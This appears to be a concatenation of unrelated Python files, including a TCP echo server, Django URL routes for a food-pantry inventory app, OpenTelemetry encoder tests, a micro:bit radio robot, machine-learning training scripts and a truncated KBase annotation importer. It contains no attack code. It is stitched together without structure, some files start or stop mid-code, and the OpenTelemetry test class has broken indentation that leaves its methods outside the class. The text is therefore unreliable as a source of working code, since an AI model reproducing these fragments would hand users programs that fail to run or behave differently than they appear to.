    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow fast restarts without waiting for TIME_WAIT sockets to expire.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(backlog)
    msg = 0
    try:
        while True:
            client, address = s.accept()
            try:
                # A blocking recv() returns data, or b'' once the peer has
                # closed.  BUG FIX: the original looped with a sleep while
                # recv() returned b'', which spins forever for a client that
                # disconnects without sending anything.
                data = client.recv(size)
                if data:
                    now = datetime.datetime.now().isoformat()
                    print(("{} received msg={} "
                           "data={} replying").format(
                               now,
                               msg,
                               data))
                    # Keep the message counter bounded.
                    msg += 1
                    if msg > 1000000:
                        msg = 0
                    # Echo the message back to the client.
                    client.send(data)
                else:
                    # Peer disconnected without sending; pause briefly to
                    # keep the original pacing on degenerate clients.
                    time.sleep(sleep_in_seconds)
            finally:
                # BUG FIX: the original only closed the client socket on the
                # shutdown path, leaking a descriptor per connection.
                client.close()
            if os.path.exists(shutdown_hook):
                now = datetime.datetime.now().isoformat()
                print(("{} detected shutdown "
                       "file={}").format(
                           now,
                           shutdown_hook))
                # BUG FIX: the original logged the shutdown but never left
                # the accept loop, so the hook had no effect.
                break
    finally:
        s.close()
# Start the server only when executed directly (not on import).
if __name__ == '__main__':
    listen_on_tcp_port()
|
import os, re
def processFile(file):
    """Scan a text file for numbered section headings and print them.

    Each line is matched against a section number like ``1.2`` or ``1.2.3``
    followed by the section title; the section number, its dot-separated
    parts and the title are printed.  Does nothing if *file* is not an
    existing regular file.

    :param file: path of the text file to scan
    """
    if not os.path.isfile(file):
        return
    # BUG FIX: the original pattern used '.' (any character) between the
    # digits; '\.' matches the literal dot of section numbers like '1.2.3'.
    # Compile once instead of once per line, and hoist it out of the loop.
    sectionRegex = re.compile(r'(\d\.\d(\.\d)?)\s+([\sa-zA-Z0-9\.\-_\\/,;\?]*)')
    # Use a context manager so the file is closed even if parsing raises
    # (the original closed it manually and only on the success path).
    with open(file, mode="r", encoding="utf-8") as f:
        lines = f.readlines()
    print(len(lines))
    for line in lines:
        match = sectionRegex.search(line)
        # The pattern always yields 3 groups, so the original
        # ``len(match.groups()) >= 2`` check was constant-true and dropped.
        if match:
            section = match.groups()[0]
            print("found: " + section)
            parts = section.split(".")
            print(parts)
            content = match.groups()[2]
            print(content)
processFile("C:\\Code\\RelatedRecords.Tests\\WpfInterviewer\\text.txt") |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ConfigParser, datetime, locale, time
from datetime import date
# Use the system default locale so month names parse per the user's
# language (the date formats handled below are Spanish-style).
locale.setlocale(locale.LC_ALL, '')
# Configuration file read once at import time.
# NOTE: ConfigParser/readfp are the Python 2 names; this module targets
# Python 2.
CONFIG_FILE = 'config.ini'
config = ConfigParser.ConfigParser()
with open(CONFIG_FILE) as fp:
    config.readfp(fp)
class UnrecognizedDateFormatError(Exception):
    """Raised when a date string matches none of the supported formats.

    The offending string is kept on the ``date`` attribute so callers can
    report it.
    """
    def __init__(self, message, date):
        # Keep the unparseable input, then delegate message handling to the
        # Exception base class (py2-compatible super call).
        self.date = date
        super(UnrecognizedDateFormatError, self).__init__(message)
def parse_date(date=None):
    """Parse a (Spanish-style) date string into a ``datetime.date``.

    The formats ``'%d de %B de %Y'``, ``'%d de %B'`` and ``'%Y'`` are tried
    in order; the first one that matches wins.

    :param date: the date string to parse
    :raises UnrecognizedDateFormatError: if no format matches
    """
    for fmt in ('%d de %B de %Y', '%d de %B', '%Y'):
        try:
            parsed = time.strptime(date, fmt)
        except ValueError:
            continue
        return datetime.date.fromtimestamp(time.mktime(parsed))
    raise UnrecognizedDateFormatError("Could not parse date", date)
|
"""
Manage the urls for the F. P. I. application.
"""
from django.urls import path
from django.views.generic import TemplateView
from fpiweb.views import \
AboutView, \
ActivityDownloadView, \
BoxDetailsView, \
BoxEditView, \
BoxEmptyMoveView, \
BoxEmptyView, \
BoxItemFormView, \
BoxMoveView, \
BoxNewView, \
BoxScannedView, \
BuildPalletView, \
ConstraintCreateView, \
ConstraintDeleteView, \
ConstraintsListView, \
ConstraintUpdateView, \
IndexView, \
LocBinCreateView, \
LocBinDeleteView, \
LocBinListView, \
LocBinUpdateView, \
LocRowCreateView, \
LocRowDeleteView, \
LocRowListView, \
LocRowUpdateView, \
LocTierCreateView, \
LocTierDeleteView, \
LocTierListView, \
LocTierUpdateView, \
LoginView, \
LogoutView, \
MaintenanceView, \
ManualBoxMenuView, \
ManualBoxStatusView, \
ManualCheckinBoxView, \
ManualConsumeBoxView, \
ManualMenuView, \
ManualMoveBoxView, \
ManualNewBoxView, \
ManualPalletMenuView, \
ManualPalletMoveView, \
ManualPalletNew, \
ManualPalletStatus, \
PalletManagementView, \
PalletSelectView, \
PrintLabelsView, \
ScannerView, \
TestScanView
# from fpiweb.views import ConstraintDetailView
# Module metadata.
__author__ = '(Multiple)'
__project__ = "Food-Pantry-Inventory"
__creation_date__ = "04/01/2019"
# set the namespace for the application (used as "fpiweb:<name>" in reverse())
app_name = 'fpiweb'
# Routing table for the fpiweb application.
# NOTE(review): several route names are registered more than once ('index',
# 'build_pallet', 'build_pallet_add_box'); Django's reverse() resolves each
# name to the LAST entry registered under it.
urlpatterns = [
    # index page
    # e.g. /fpiweb/ or /fpiweb/index/
    path('', IndexView.as_view(), name='index'),
    path('index/', IndexView.as_view(), name='index'),
    # about page
    # e.g. /fpiweb/about/
    path('about/', AboutView.as_view(), name='about'),
    # login page
    # e.g. /fpiweb/login/
    path('login/', LoginView.as_view(), name='login'),
    # logout page
    # e.g. /fpiweb/logout/
    path('logout/', LogoutView.as_view(), name='logout'),
    # Maintenance page
    # e.g. /fpiweb/maintenance/ = list of constraints
    path('maintenance/', MaintenanceView.as_view(),
         name='maintenance'),
    # LocRow List page
    # e.g. /fpiweb/loc_rows/ = list of loc_rows
    path('loc_row/', LocRowListView.as_view(),
         name='loc_row_view'),
    # LocRow Add page
    # e.g. /fpiweb/loc_row/add/ = add a loc_row
    path('loc_row/add/', LocRowCreateView.as_view(),
         name='loc_row_new', ),
    # LocRow Edit page
    # e.g. /fpiweb/loc_row/edit/4/ = edit loc_row # 4
    path('loc_row/edit/<int:pk>/', LocRowUpdateView.as_view(),
         name='loc_row_update', ),
    # LocRow Delete Page
    # e.g. /fpiweb/loc_row/delete/4/ = delete loc_row # 4
    path('loc_row/delete/<int:pk>/', LocRowDeleteView.as_view(),
         name='loc_row_delete', ),
    # LocBin List page
    # e.g. /fpiweb/loc_bins/ = list of loc_bins
    path('loc_bin/', LocBinListView.as_view(),
         name='loc_bin_view'),
    # LocBin Add page
    # e.g. /fpiweb/loc_bin/add/ = add a loc_bin
    path('loc_bin/add/', LocBinCreateView.as_view(),
         name='loc_bin_new', ),
    # LocBin Edit page
    # e.g. /fpiweb/loc_bin/edit/4/ = edit loc_bin # 4
    path('loc_bin/edit/<int:pk>/', LocBinUpdateView.as_view(),
         name='loc_bin_update', ),
    # LocBin Delete Page
    # e.g. /fpiweb/loc_bin/delete/4/ = delete loc_bin # 4
    path('loc_bin/delete/<int:pk>/', LocBinDeleteView.as_view(),
         name='loc_bin_delete', ),
    # LocTier List page
    # e.g. /fpiweb/loc_tiers/ = list of loc_tiers
    path('loc_tier/', LocTierListView.as_view(),
         name='loc_tier_view'),
    # LocTier Add page
    # e.g. /fpiweb/loc_tier/add/ = add a loc_tier
    path('loc_tier/add/', LocTierCreateView.as_view(),
         name='loc_tier_new', ),
    # LocTier Edit page
    # e.g. /fpiweb/loc_tier/edit/4/ = edit loc_tier # 4
    path('loc_tier/edit/<int:pk>/', LocTierUpdateView.as_view(),
         name='loc_tier_update', ),
    # LocTier Delete Page
    # e.g. /fpiweb/loc_tier/delete/4/ = delete loc_tier # 4
    path('loc_tier/delete/<int:pk>/', LocTierDeleteView.as_view(),
         name='loc_tier_delete', ),
    # Constraint List page
    # e.g. /fpiweb/constraints/ = list of constraints
    path('constraints/', ConstraintsListView.as_view(),
         name='constraints_view'),
    # Constraint Add page
    # e.g. /fpiweb/constraint/add/ = add a constraint
    path('constraint/add/', ConstraintCreateView.as_view(),
         name='constraint_new', ),
    # Constraint Edit page
    # e.g. /fpiweb/constraint/edit/4/ = edit constraint # 4
    path('constraint/edit/<int:pk>/', ConstraintUpdateView.as_view(),
         name='constraint_update', ),
    # Constraint Delete Page
    # e.g. /fpiweb/constraint/delete/4/ = delete constraint # 4
    path('constraint/delete/<int:pk>/', ConstraintDeleteView.as_view(),
         name='constraint_delete', ),
    # Box Add page
    # e.g. /fpiweb/box/add/ = add a box to inventory
    path('box/new/<str:box_number>/', BoxNewView.as_view(), name='box_new'),
    # Box Edit page
    # e.g. /fpiweb/box/<pk>/edit = edit a box in inventory
    path('box/<int:pk>/edit/', BoxEditView.as_view(), name='box_edit'),
    # Box Detail page
    # e.g. /fpiweb/box/<pk>/ = view the information about a box
    path('box/<int:pk>/', BoxDetailsView.as_view(), name='box_details'),
    # Box scan page (QR code scans will start here)
    # e.g. /fpiweb/box/box12345/ = view the information about a box
    path('box/box<int:number>/', BoxScannedView.as_view(), name='box_scanned'),
    # Move or empty a box
    # e.g. /fpiweb/box/<pk>/empty_move = consume or move a box
    path('box/<int:pk>/empty_move/', BoxEmptyMoveView.as_view(),
         name='box_empty_move'),
    # Move a box
    # e.g. /fpiweb/box/<pk>/move/ = change location of box in inventory
    path('box/<int:pk>/move/', BoxMoveView.as_view(), name='box_move'),
    # fill a box
    # e.g. /fpiweb/box/<pk>/fill/ = fill an empy box and put in inventory
    path('box/<int:pk>/fill/', BoxEmptyMoveView.as_view(), name='box_fill'),
    # Empty a box
    # e.g. /fpiweb/box/<pk>/empty = consume the product in a box
    path('box/<int:pk>/empty/', BoxEmptyMoveView.as_view(), name='box_empty'),
    # send scan image or box number to server receive JSON info on box
    path('box/box_form/', BoxItemFormView.as_view(), name='box_form'),
    # e.g. /fpiweb/test_scan/ = ???
    path('test_scan/', TestScanView.as_view(), name='test_scan'),
    # Add a box to a pallet view
    # e.g. /fpiweb/build_pallet/box/box12345/ = add a box to existing pallet
    # NOTE(review): the extra-kwargs dict {'box_pk': 'pk'} passes the literal
    # string 'pk' to the view -- confirm this is intended.
    path(
        'build_pallet/<str:box_number>/',
        BuildPalletView.as_view(),
        {'box_pk': 'pk'},
        name='build_pallet_add_box'
    ),
    # Start a new pallet view
    # e.g. /fpiweb/build_pallet/ = start a new pallet
    path(
        'build_pallet/',
        BuildPalletView.as_view(),
        name='build_pallet'
    ),
    # Manual box management menu
    # e.g. /fpiweb/manualmenu/ = show manual box management menu
    path(
        'manualmenu/',
        ManualMenuView.as_view(),
        name='manual_menu'
    ),
    # Manual pallet management menu
    # e.g. /fpiweb/manualpalletmenu/ = show manual pallet management menu
    path('manualpalletmenu/',
         ManualPalletMenuView.as_view(),
         name='manual_pallet_menu'),
    # Manual box management menu
    # e.g. /fpiweb/manualboxmenu/ = show manual box management menu
    path('manualboxmenu/',
         ManualBoxMenuView.as_view(),
         name='manual_box_menu'),
    # Manually start a new pallet
    # e.g. /fpiweb/manualpalletnew = manually starting a new pallet
    path(
        'manual_pallet_new/',
        ManualPalletNew.as_view(),
        name='manual_pallet_new'
    ) ,
    path(
        'manual_pallet_move/',
        ManualPalletMoveView.as_view(),
        name='manual_pallet_move',
    ),
    # Manually show the current pallet status
    # e.g. /fpiweb/manualpalletstatus/5/ = current pallet status
    path(
        'manual_pallet_status/<int:pk>',
        ManualPalletStatus.as_view(),
        name='manual_pallet_status'
    ),
    # Manually ask a question or notify user
    # e.g. /fpiweb/manual_note/ = Ask a question or post a note
    # path(
    #     'manual_question/',
    #     ManualNotification.as_view(),
    #     name='manual_question'
    # ),
    path(
        'pallet/management/',
        PalletManagementView.as_view(),
        name='palletManagement',
    ),
    # NOTE(review): duplicate registrations -- 'build_pallet' and
    # 'build_pallet_add_box' were already defined above; these later entries
    # are the ones reverse() will actually resolve.
    path('build_pallet/', BuildPalletView.as_view(), name='build_pallet'),
    path(
        'build_pallet/<int:box_pk>/',
        BuildPalletView.as_view(),
        name='build_pallet_add_box'),
    path('pallet/select/', PalletSelectView.as_view(), name='pallet_select'),
    path('scanner/', ScannerView.as_view(), name='scanner'),
    path('print_labels/', PrintLabelsView.as_view(), name='print_labels'),
    path(
        'activity/download/',
        ActivityDownloadView.as_view(),
        name='download_activities'),
    # Manually add an empty box to the inventory system
    # e.g. /fpiweb/manual_box_status/ = determine the status of a box manually
    path('manual_add_box/', ManualNewBoxView.as_view(),
         name='manual_add_box', ),
    # Manually check in a box
    # e.g. /fpiweb/manual_checkin_box/ = check in a box manually
    path(
        'manual_checkin_box/',
        ManualCheckinBoxView.as_view(),
        name='manual_checkin_box',
    ),
    # Manually check out a box
    # e.g. /fpiweb/manual_checkout_box/ = check out a box manually
    path(
        'manual_checkout_box/',
        ManualConsumeBoxView.as_view(),
        name='manual_checkout_box',
    ),
    # Manually move a filled box
    # e.g. /fpiweb/manual_move_box/ = move a filled box manually
    path(
        'manual_move_box/',
        ManualMoveBoxView.as_view(),
        name='manual_move_box',
    ),
    # Manually get a box status
    # e.g. /fpiweb/manual_box_status/ = determine the status of a box manually
    path(
        'manual_box_status/',
        ManualBoxStatusView.as_view(),
        name='manual_box_status',
    ),
]
|
from PyMesh import unique_rows
from PyMesh import face_normals
from PyMesh import vertex_normals
from PyMesh import edge_normals
from PyMesh import orient_outward
def orient_faces(vertices, faces, outward=True):
    """Return *faces* with a consistent orientation.

    The faces are first oriented outward with PyMesh's ``orient_outward``;
    when ``outward`` is False the per-face vertex order is reversed,
    flipping every face inward.
    """
    result = orient_outward(vertices, faces)
    if not outward:
        flipped_order = list(range(faces.shape[1] - 1, -1, -1))
        result = result[:, flipped_order]
    return result
|
from django.contrib import admin
from apps.news.models import Newsletter
# Make the Newsletter model manageable through the Django admin site.
admin.site.register(Newsletter)
|
from setuptools import setup
# Packaging metadata for the pyeventick client library.
setup(name='pyeventick',
      version='0.2',
      description='Simple integrate of API eventick.com.br with python',
      url='https://github.com/hudsonbrendon/pyeventick',
      author='Hudson Brendon',
      author_email='[email protected]',
      license='MIT',
      packages=['pyeventick'],
      # Runtime dependencies installed along with the package.
      install_requires=[
          'requests',
      ],
      # Not zip-safe: install the package unpacked on disk.
      zip_safe=False)
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=protected-access
import unittest
from typing import List, Tuple
from opentelemetry.exporter.otlp.proto.http.trace_exporter.encoder import (
_SPAN_KIND_MAP,
_encode_span_id,
_encode_status,
_encode_trace_id,
_ProtobufEncoder,
)
from opentelemetry.proto.collector.trace.v1.trace_service_pb2 import (
ExportTraceServiceRequest as PB2ExportTraceServiceRequest,
)
from opentelemetry.proto.common.v1.common_pb2 import AnyValue as PB2AnyValue
from opentelemetry.proto.common.v1.common_pb2 import (
InstrumentationLibrary as PB2InstrumentationLibrary,
)
from opentelemetry.proto.common.v1.common_pb2 import KeyValue as PB2KeyValue
from opentelemetry.proto.resource.v1.resource_pb2 import (
Resource as PB2Resource,
)
from opentelemetry.proto.trace.v1.trace_pb2 import (
InstrumentationLibrarySpans as PB2InstrumentationLibrarySpans,
)
from opentelemetry.proto.trace.v1.trace_pb2 import (
ResourceSpans as PB2ResourceSpans,
)
from opentelemetry.proto.trace.v1.trace_pb2 import Span as PB2SPan
from opentelemetry.proto.trace.v1.trace_pb2 import Status as PB2Status
from opentelemetry.sdk.trace import Event as SDKEvent
from opentelemetry.sdk.trace import Resource as SDKResource
from opentelemetry.sdk.trace import SpanContext as SDKSpanContext
from opentelemetry.sdk.trace import _Span as SDKSpan
from opentelemetry.sdk.util.instrumentation import (
InstrumentationInfo as SDKInstrumentationInfo,
)
from opentelemetry.trace import Link as SDKLink
from opentelemetry.trace import SpanKind as SDKSpanKind
from opentelemetry.trace import TraceFlags as SDKTraceFlags
from opentelemetry.trace.status import Status as SDKStatus
from opentelemetry.trace.status import StatusCode as SDKStatusCode
class TestProtobufEncoder(unittest.TestCase):
def test_encode(self):
    """The encoder must produce exactly the expected protobuf request."""
    spans, expected = self.get_exhaustive_test_spans()
    encoded = _ProtobufEncoder().encode(spans)
    self.assertEqual(encoded, expected)
def test_serialize(self):
    """Serialization must equal the expected request's wire encoding."""
    spans, expected = self.get_exhaustive_test_spans()
    serialized = _ProtobufEncoder().serialize(spans)
    self.assertEqual(serialized, expected.SerializeToString())
def test_content_type(self):
    """The encoder advertises the protobuf HTTP content type."""
    expected_type = "application/x-protobuf"
    self.assertEqual(_ProtobufEncoder._CONTENT_TYPE, expected_type)
@staticmethod
def get_exhaustive_otel_span_list() -> List[SDKSpan]:
    """Build four SDK spans exercising every encodable field.

    span1 carries attributes, an event, a link, a parent and an error
    status; span2 and span3 share a non-empty resource; span4 carries
    instrumentation info.  All start/end times are fixed offsets from a
    constant base time so the resulting encodings are deterministic.
    """
    trace_id = 0x3E0C63257DE34C926F9EFCD03927272E
    base_time = 683647322 * 10 ** 9  # in ns
    # Four staggered start times, with end times 50-300 ms later.
    start_times = (
        base_time,
        base_time + 150 * 10 ** 6,
        base_time + 300 * 10 ** 6,
        base_time + 400 * 10 ** 6,
    )
    end_times = (
        start_times[0] + (50 * 10 ** 6),
        start_times[1] + (100 * 10 ** 6),
        start_times[2] + (200 * 10 ** 6),
        start_times[3] + (300 * 10 ** 6),
    )
    parent_span_context = SDKSpanContext(
        trace_id, 0x1111111111111111, is_remote=False
    )
    other_context = SDKSpanContext(
        trace_id, 0x2222222222222222, is_remote=False
    )
    # span1: sampled span with a parent, an event, a link, attributes and
    # an explicit error status.
    span1 = SDKSpan(
        name="test-span-1",
        context=SDKSpanContext(
            trace_id,
            0x34BF92DEEFC58C92,
            is_remote=False,
            trace_flags=SDKTraceFlags(SDKTraceFlags.SAMPLED),
        ),
        parent=parent_span_context,
        events=(
            SDKEvent(
                name="event0",
                timestamp=base_time + 50 * 10 ** 6,
                attributes={
                    "annotation_bool": True,
                    "annotation_string": "annotation_test",
                    "key_float": 0.3,
                },
            ),
        ),
        links=(
            SDKLink(context=other_context, attributes={"key_bool": True}),
        ),
        resource=SDKResource({}),
    )
    span1.start(start_time=start_times[0])
    span1.set_attribute("key_bool", False)
    span1.set_attribute("key_string", "hello_world")
    span1.set_attribute("key_float", 111.22)
    span1.set_status(SDKStatus(SDKStatusCode.ERROR, "Example description"))
    span1.end(end_time=end_times[0])
    # span2: root span (no parent) with a non-empty resource.
    span2 = SDKSpan(
        name="test-span-2",
        context=parent_span_context,
        parent=None,
        resource=SDKResource(attributes={"key_resource": "some_resource"}),
    )
    span2.start(start_time=start_times[1])
    span2.end(end_time=end_times[1])
    # span3: same resource as span2, plus one attribute.
    span3 = SDKSpan(
        name="test-span-3",
        context=other_context,
        parent=None,
        resource=SDKResource(attributes={"key_resource": "some_resource"}),
    )
    span3.start(start_time=start_times[2])
    span3.set_attribute("key_string", "hello_world")
    span3.end(end_time=end_times[2])
    # span4: empty resource but explicit instrumentation info.
    span4 = SDKSpan(
        name="test-span-4",
        context=other_context,
        parent=None,
        resource=SDKResource({}),
        instrumentation_info=SDKInstrumentationInfo(
            name="name", version="version"
        ),
    )
    span4.start(start_time=start_times[3])
    span4.end(end_time=end_times[3])
    return [span1, span2, span3, span4]
    def get_exhaustive_test_spans(
        self,
    ) -> Tuple[List[SDKSpan], PB2ExportTraceServiceRequest]:
        """Return the exhaustive span fixtures plus their expected encoding.

        Builds the four SDK spans from get_exhaustive_otel_span_list() and a
        hand-written PB2ExportTraceServiceRequest describing exactly how the
        encoder is expected to serialize them: spans grouped first by
        resource, then by instrumentation library.
        """
        otel_spans = self.get_exhaustive_otel_span_list()
        # All fixture spans share one trace id; all are INTERNAL kind.
        trace_id = _encode_trace_id(otel_spans[0].context.trace_id)
        span_kind = _SPAN_KIND_MAP[SDKSpanKind.INTERNAL]
        pb2_service_request = PB2ExportTraceServiceRequest(
            resource_spans=[
                # Group 1: the empty resource (spans 1 and 4).
                PB2ResourceSpans(
                    resource=PB2Resource(),
                    instrumentation_library_spans=[
                        PB2InstrumentationLibrarySpans(
                            instrumentation_library=PB2InstrumentationLibrary(),
                            spans=[
                                # span1: attributes, one event, one link,
                                # ERROR status.
                                PB2SPan(
                                    trace_id=trace_id,
                                    span_id=_encode_span_id(
                                        otel_spans[0].context.span_id
                                    ),
                                    trace_state=None,
                                    parent_span_id=_encode_span_id(
                                        otel_spans[0].parent.span_id
                                    ),
                                    name=otel_spans[0].name,
                                    kind=span_kind,
                                    start_time_unix_nano=otel_spans[
                                        0
                                    ].start_time,
                                    end_time_unix_nano=otel_spans[0].end_time,
                                    attributes=[
                                        PB2KeyValue(
                                            key="key_bool",
                                            value=PB2AnyValue(
                                                bool_value=False
                                            ),
                                        ),
                                        PB2KeyValue(
                                            key="key_string",
                                            value=PB2AnyValue(
                                                string_value="hello_world"
                                            ),
                                        ),
                                        PB2KeyValue(
                                            key="key_float",
                                            value=PB2AnyValue(
                                                double_value=111.22
                                            ),
                                        ),
                                    ],
                                    events=[
                                        PB2SPan.Event(
                                            name="event0",
                                            time_unix_nano=otel_spans[0]
                                            .events[0]
                                            .timestamp,
                                            attributes=[
                                                PB2KeyValue(
                                                    key="annotation_bool",
                                                    value=PB2AnyValue(
                                                        bool_value=True
                                                    ),
                                                ),
                                                PB2KeyValue(
                                                    key="annotation_string",
                                                    value=PB2AnyValue(
                                                        string_value="annotation_test"
                                                    ),
                                                ),
                                                PB2KeyValue(
                                                    key="key_float",
                                                    value=PB2AnyValue(
                                                        double_value=0.3
                                                    ),
                                                ),
                                            ],
                                        )
                                    ],
                                    links=[
                                        PB2SPan.Link(
                                            trace_id=_encode_trace_id(
                                                otel_spans[0]
                                                .links[0]
                                                .context.trace_id
                                            ),
                                            span_id=_encode_span_id(
                                                otel_spans[0]
                                                .links[0]
                                                .context.span_id
                                            ),
                                            attributes=[
                                                PB2KeyValue(
                                                    key="key_bool",
                                                    value=PB2AnyValue(
                                                        bool_value=True
                                                    ),
                                                ),
                                            ],
                                        )
                                    ],
                                    status=PB2Status(
                                        deprecated_code=PB2Status.DEPRECATED_STATUS_CODE_UNKNOWN_ERROR,  # pylint: disable=no-member
                                        code=SDKStatusCode.ERROR.value,
                                        message="Example description",
                                    ),
                                )
                            ],
                        ),
                        # span4 carries a named instrumentation library, so
                        # it lands in its own InstrumentationLibrarySpans.
                        PB2InstrumentationLibrarySpans(
                            instrumentation_library=PB2InstrumentationLibrary(
                                name="name",
                                version="version",
                            ),
                            spans=[
                                PB2SPan(
                                    trace_id=trace_id,
                                    span_id=_encode_span_id(
                                        otel_spans[3].context.span_id
                                    ),
                                    trace_state=None,
                                    parent_span_id=None,
                                    name=otel_spans[3].name,
                                    kind=span_kind,
                                    start_time_unix_nano=otel_spans[
                                        3
                                    ].start_time,
                                    end_time_unix_nano=otel_spans[3].end_time,
                                    attributes=None,
                                    events=None,
                                    links=None,
                                    status={},
                                )
                            ],
                        ),
                    ],
                ),
                # Group 2: spans 2 and 3 share the 'key_resource' resource.
                PB2ResourceSpans(
                    resource=PB2Resource(
                        attributes=[
                            PB2KeyValue(
                                key="key_resource",
                                value=PB2AnyValue(
                                    string_value="some_resource"
                                ),
                            )
                        ]
                    ),
                    instrumentation_library_spans=[
                        PB2InstrumentationLibrarySpans(
                            instrumentation_library=PB2InstrumentationLibrary(),
                            spans=[
                                PB2SPan(
                                    trace_id=trace_id,
                                    span_id=_encode_span_id(
                                        otel_spans[1].context.span_id
                                    ),
                                    trace_state=None,
                                    parent_span_id=None,
                                    name=otel_spans[1].name,
                                    kind=span_kind,
                                    start_time_unix_nano=otel_spans[
                                        1
                                    ].start_time,
                                    end_time_unix_nano=otel_spans[1].end_time,
                                    attributes=None,
                                    events=None,
                                    links=None,
                                    status={},
                                ),
                                PB2SPan(
                                    trace_id=trace_id,
                                    span_id=_encode_span_id(
                                        otel_spans[2].context.span_id
                                    ),
                                    trace_state=None,
                                    parent_span_id=None,
                                    name=otel_spans[2].name,
                                    kind=span_kind,
                                    start_time_unix_nano=otel_spans[
                                        2
                                    ].start_time,
                                    end_time_unix_nano=otel_spans[2].end_time,
                                    attributes=[
                                        PB2KeyValue(
                                            key="key_string",
                                            value=PB2AnyValue(
                                                string_value="hello_world"
                                            ),
                                        ),
                                    ],
                                    events=None,
                                    links=None,
                                    status={},
                                ),
                            ],
                        )
                    ],
                ),
            ]
        )
        return otel_spans, pb2_service_request
def test_encode_status_code_translations(self):
self.assertEqual(
_encode_status(SDKStatus(status_code=SDKStatusCode.UNSET)),
PB2Status(
deprecated_code=PB2Status.DEPRECATED_STATUS_CODE_OK, # pylint: disable=no-member
code=SDKStatusCode.UNSET.value,
),
)
self.assertEqual(
_encode_status(SDKStatus(status_code=SDKStatusCode.OK)),
PB2Status(
deprecated_code=PB2Status.DEPRECATED_STATUS_CODE_OK, # pylint: disable=no-member
code=SDKStatusCode.OK.value,
),
)
self.assertEqual(
_encode_status(SDKStatus(status_code=SDKStatusCode.ERROR)),
PB2Status(
deprecated_code=PB2Status.DEPRECATED_STATUS_CODE_UNKNOWN_ERROR, # pylint: disable=no-member
code=SDKStatusCode.ERROR.value,
),
)
|
from microbit import *
import radio
# Radio channel shared by the remote control and this robot (must match on
# both devices).
CHANNEL = 19
# Movement functions
def drive_forwards(speed):
    """Drive both motors forwards at the given speed.

    Args:
        speed: motor speed as a percentage (0-100). Values outside that
            range are clamped so write_analog never sees an illegal duty.

    Pins 8/12 select motor direction (0 here, paired with forwards in the
    caller); pins 0/1 carry the PWM duty cycle (0-1023).
    """
    # Clamp, then scale percent -> 0..1023 duty as an explicit int.
    duty = int(max(0, min(100, speed)) * 1023 / 100)
    pin8.write_digital(0)
    pin12.write_digital(0)
    pin0.write_analog(duty)
    pin1.write_analog(duty)
def reverse_arc_left():
    """Reverse in an arc to the left by driving the two motors at fixed,
    unequal duty cycles (direction pins set to reverse)."""
    for direction_pin in (pin8, pin12):
        direction_pin.write_digital(1)
    pin0.write_analog(700)
    pin1.write_analog(400)
# State flag — set but never read below; presumably for future use (TODO confirm).
is_driving_forwards = True
# Join the shared channel and start listening for commands.
radio.config(channel=CHANNEL)
radio.on()
# Stopped at first then moving forwards or reversing to the left
while True:
    # receive() returns None when no message is pending.
    msg = radio.receive()
    if msg is not None:
        if msg == 'FORWARDS':
            display.show(Image.ARROW_N)
            drive_forwards(50)
        elif msg == 'REVERSE_LEFT':
            display.show(Image.ARROW_SW)
            reverse_arc_left()
|
from stella.preprocessing_flares import *
from numpy.testing import assert_almost_equal
# Build the flare data set once at import time so all tests share it.
# Requires 'Guenther_2020_flare_catalog.txt' (and its light curves) in cwd.
pre = FlareDataSet(fn_dir='.',
                   catalog='Guenther_2020_flare_catalog.txt')
def test_processing():
    """The preprocessed flare set must have the expected class balance and
    train/val/test split shapes."""
    assert_almost_equal(pre.frac_balance, 0.7, decimal=1)
    expected_shapes = {'train_data': (62, 200, 1),
                       'val_data': (8, 200, 1),
                       'test_data': (8, 200, 1)}
    for attr, shape in expected_shapes.items():
        assert(getattr(pre, attr).shape == shape)
|
from src import mnist
from src import cnn
from src import rnn
|
import cxr_dataset as CXR
import eval_model as E
import model as M
# you will need to customize PATH_TO_IMAGES to where you have uncompressed
# NIH images
if __name__ == '__main__':
    # Local path to the uncompressed NIH chest X-ray images — customize this.
    PATH_TO_IMAGES = "C:/Users/User/Desktop/Hibah Dikti/DB/images"
    WEIGHT_DECAY = 1e-4
    LEARNING_RATE = 0.01
    # Train the CNN; presumably returns predictions and AUC scores —
    # verify against model.train_cnn.
    preds, aucs = M.train_cnn(PATH_TO_IMAGES, LEARNING_RATE, WEIGHT_DECAY)
from nlp.bp import bp
from nlp.bp import mnist_loader
# Fully connected network: 784 inputs (28x28 pixels), 100 hidden units,
# 10 output classes.
net = bp.Network([784, 100, 10])
training_data, validation_data, test_data = mnist_loader.load_data_wrapper()
# SGD arguments: 30 epochs, mini-batch size 10, learning rate 3.0;
# test_data enables per-epoch evaluation.
net.SGD(training_data, 30, 10, 3.0, test_data=test_data)
|
import pandas as pd
import os
import logging
import yaml
import datetime
import json
import time
import sys
import holoviews as hv
from holoviews import opts
from holoviews.element import Div
from bokeh.models import HoverTool
hv.extension('bokeh')
# Ontology namespaces accepted by the bulk import app; any other string in
# the 'ontology' column aborts the run (see bulk_df_to_ontology).
allowed_ontologies = ["KO", "EC", "SSO", "RO", "META", "MSRXN",
                      "MSCPD", "MSCPX", "BIGG", "BIGGCPD", "GO", "TC", "RHEA"]
def df_to_ontology(params, pass_df=None, method="Import Annotations"):
    """Build a single annotation-ontology event from a TSV or a DataFrame.

    Converts either the staging-area text file named in ``params`` or a
    DataFrame handed over by the merge/bulk apps into the event-dictionary
    format expected by the annotation ontology API's
    add_annotation_ontology_events() method.

    Args:
        params: app parameters; must contain 'description', 'ontology' and,
            when no DataFrame is passed, 'annotation_file'.
        pass_df: optional two-column (gene, term) DataFrame supplied by the
            merge/bulk apps instead of a file.
        method: method label recorded on the event.

    Returns:
        A one-element list containing the event dictionary.
    """
    if isinstance(pass_df, pd.DataFrame):
        annotations = pass_df
    else:
        # Debug runs read from the module's test data instead of /staging.
        if params.get('debug') is True:
            annotations_file_path = os.path.join(
                '/kb/module/test/test_data', params['annotation_file'])
        else:
            annotations_file_path = os.path.join("/staging/", params['annotation_file'])
        annotations = pd.read_csv(annotations_file_path,
